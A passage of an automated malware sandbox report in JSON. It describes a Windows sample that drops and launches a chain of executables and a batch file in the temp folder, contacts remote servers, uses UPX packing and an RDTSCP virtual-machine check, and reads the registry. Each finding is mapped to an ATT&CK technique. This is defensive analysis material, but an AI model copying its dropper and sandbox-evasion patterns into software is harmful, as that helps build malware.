uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"110012009e286b76@CRYPTBASE.dll\"\n \"0d000e00844b3a6b@iphlpapi.dll\"\n \"0f001000dc4b3a6b@iphlpapi.dll\"\n \"0c000d00244c3a6b@iphlpapi.dll\"\n \"140015006c4c3a6b@iphlpapi.dll\"\n \"0c000d00e04c3a6b@iphlpapi.dll\"\n \"15001600c03e3a6b@ADVAPI32.dll\"\n \"0e000f00703f3a6b@ADVAPI32.dll\"\n \"0e000f00cc3f3a6b@ADVAPI32.dll\"\n \"11001200b4473a6b@ADVAPI32.dll\"\n \"1100120048483a6b@ADVAPI32.dll\"\n \"120013008c483a6b@ADVAPI32.dll\"\n \"12001300e4483a6b@ADVAPI32.dll\"\n \"14001500386e3a6b@ADVAPI32.dll\"\n \"14001500506e3a6b@ADVAPI32.dll\"\n \"14001500686e3a6b@ADVAPI32.dll\"\n \"17001800806e3a6b@ADVAPI32.dll\"\n \"0d000e00986e3a6b@ADVAPI32.dll\"\n \"11001200a86e3a6b@ADVAPI32.dll\"\n \"11001200bc6e3a6b@ADVAPI32.dll\"\n \"0d000e0034493a6b@SHELL32.dll\"\n \"0d000e00b0493a6b@SHELL32.dll\"\n \"0f001000fc6f3a6b@ADVAPI32.dll\"\n \"140015003c703a6b@ADVAPI32.dll\"\n \"1400150054703a6b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002180)\n \"bucei.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005888)\n \"bytudy.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003640)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\bucei.exe\"\" - (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\_vslite.bat\"\" - (UID: 00000000-00002180)\n \"bucei.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\bytudy.exe\" OK\" - (UID: 00000000-00005888)\n \"bytudy.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\syzoe.exe\"\" - (UID: 00000000-00003640)\n \"bytudy.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\_vslite.bat\"\" - (UID: 00000000-00003640)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-2", "type": 10, "name": "Loads rich edit control libraries", "description": "\"syzoe.exe\" loaded module \"%WINDIR%\\System32\\riched20.dll\" at 6B340000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:11110\"\n \"<IPv4>:11170\"\n \"<IPv4>:11110\"\n \"<IPv4>:11110\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an writable section named \".text\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an writable section named \".reloc\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an writable section named \".htext\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an writable section named \".R*O\"\n \"syzoe.exe\" has an writable section named \"UPX0\"\n \"syzoe.exe\" has an writable section named \"UPX1\"\n \"syzoe.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an executable section named \".text\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an executable section named \".?xL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an executable section named \".htext\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an executable section named \".-(H\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has an executable section named \".Jk)\"\n \"syzoe.exe\" has an executable section named \"UPX0\"\n \"syzoe.exe\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".Jk)\" is \"0x664e00\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-26", "type": 8, "relevance": 5, "name": "The input sample possibly contains the RDTSCP instruction", "description": "Found VM detection artifact \"RDTSCP trick\" in \"sample.bin\" (Offset: 6022049)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"syzoe.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"bucei.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"bytudy.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"syzoe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"syzoe.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\syzoe.exe]- [targetUID: 00000000-00003640]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"bucei.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"bytudy.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" connecting to \"\\ThemeApiPort\"\n \"bucei.exe\" connecting to \"\\ThemeApiPort\"\n \"bytudy.exe\" connecting to \"\\ThemeApiPort\"\n \"syzoe.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"bucei.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bucei.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"bucei.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"bytudy.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bytudy.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"bytudy.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\iphlpapi.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\iphlpapi.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfinfo.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\golfset.ini\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe.Local\\\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe:Zone.Identifier\"\n 